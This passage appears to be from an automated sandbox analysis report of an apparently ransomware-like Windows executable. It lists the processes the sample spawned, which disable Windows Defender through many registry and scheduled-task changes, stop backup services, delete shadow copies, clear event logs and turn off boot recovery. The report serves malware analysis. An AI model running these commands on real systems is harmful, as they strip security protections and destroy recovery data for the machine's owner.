memory of 1052 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1052 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1052 wrote to memory of 1816 1052 net.exe net1.exe PID 1052 wrote to memory of 1816 1052 net.exe net1.exe PID 1052 wrote to memory of 1816 1052 net.exe net1.exe PID 1572 wrote to memory of 1524 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1524 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1572 wrote to memory of 1524 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe net.exe PID 1524 wrote to memory of 1588 1524 net.exe net1.exe PID 1524 wrote to memory of 1588 1524 net.exe net1.exe PID 1524 wrote to memory of 1588 1524 net.exe net1.exe PID 1572 wrote to memory of 996 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 996 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 996 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1260 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1260 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1260 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1124 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1124 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1124 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1104 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1104 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1104 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 908 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 908 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 908 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe PID 1572 wrote to memory of 1292 1572 585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe sc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"C:\Users\Admin\AppData\Local\Temp\585900f8de74f4be48011f47c91373a7a4bb97bfc2324144b61e4f4fa8ef4aa5.exe"1⤵
- Modifies extensions of user files
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1572 -
C:\Windows\system32\net.exenet.exe stop "NetMsmqActivator" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "NetMsmqActivator" /y3⤵PID:576
-
C:\Windows\system32\net.exenet.exe stop "SamSs" /y2⤵
- Suspicious use of WriteProcessMemory
PID:368 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SamSs" /y3⤵PID:864
-
C:\Windows\system32\net.exenet.exe stop "SDRSVC" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1408 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SDRSVC" /y3⤵PID:1584
-
C:\Windows\system32\net.exenet.exe stop "SstpSvc" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "SstpSvc" /y3⤵PID:1752
-
C:\Windows\system32\net.exenet.exe stop "UI0Detect" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "UI0Detect" /y3⤵PID:1448
-
C:\Windows\system32\net.exenet.exe stop "VSS" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1836 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "VSS" /y3⤵PID:1820
-
C:\Windows\system32\net.exenet.exe stop "wbengine" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1052 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "wbengine" /y3⤵PID:1816
-
C:\Windows\system32\net.exenet.exe stop "WebClient" /y2⤵
- Suspicious use of WriteProcessMemory
PID:1524 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop "WebClient" /y3⤵PID:1588
-
C:\Windows\system32\sc.exesc.exe config "NetMsmqActivator" start= disabled2⤵PID:996
-
C:\Windows\system32\sc.exesc.exe config "SamSs" start= disabled2⤵PID:1260
-
C:\Windows\system32\sc.exesc.exe config "SDRSVC" start= disabled2⤵PID:1124
-
C:\Windows\system32\sc.exesc.exe config "SstpSvc" start= disabled2⤵PID:1104
-
C:\Windows\system32\sc.exesc.exe config "UI0Detect" start= disabled2⤵PID:908
-
C:\Windows\system32\sc.exesc.exe config "VSS" start= disabled2⤵PID:1292
-
C:\Windows\system32\sc.exesc.exe config "wbengine" start= disabled2⤵PID:1596
-
C:\Windows\system32\sc.exesc.exe config "WebClient" start= disabled2⤵PID:1176
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1468
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f2⤵PID:860
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f2⤵PID:1584
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f2⤵PID:644
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f2⤵PID:820
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1932
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f2⤵PID:1140
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f2⤵PID:1160
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f2⤵PID:1540
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f2⤵PID:1612
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f2⤵PID:1464
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f2⤵PID:1704
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f2⤵PID:972
-
C:\Windows\system32\reg.exereg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f2⤵PID:1484
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:1616
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f2⤵PID:668
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable2⤵PID:560
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable2⤵PID:1064
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable2⤵PID:1608
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable2⤵PID:1520
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable2⤵PID:108
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f2⤵PID:2044
-
C:\Windows\system32\reg.exereg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f2⤵PID:1460
-
C:\Windows\system32\reg.exereg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f2⤵PID:1600
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f2⤵PID:892
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f2⤵PID:544
-
C:\Windows\system32\reg.exereg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f2⤵PID:1640
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1832
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1508
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:924
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1692
-
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:536 -
C:\Windows\system32\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1648
-
C:\Windows\system32\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:1588 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:240 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:864 -
C:\Windows\system32\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1908 -
C:\Windows\System32\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1108 -
C:\Windows\System32\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:584 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} bootstatuspolicy ignoreallfailures2⤵
- Modifies boot configuration data using bcdedit
PID:2068 -
C:\Windows\system32\bcdedit.exebcdedit.exe /set {default} recoveryenabled no2⤵
- Modifies boot configuration data using bcdedit
PID:2092 -
C:\Windows\system32\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:2112
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:2136 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:2148
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2168 -
C:\Windows\system32\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:2244
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2264
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD56360a06b3d4c4c25751261ee8344d003
SHA10d22d117921e5722a5c4d5821023a49eb1e8e51b
SHA2569b8d58886f8a6e896c97c37a048bce003b9ace4a90ac46007c39d859569cf03e
SHA512790b27a4c35e3c6764b033b0ebd21ccd1b87ddfeeb65a4b067192305feb7cc7189947d9a9243905f5d80131a2262ac04430f7f146de4f5d130e0b81478b3e555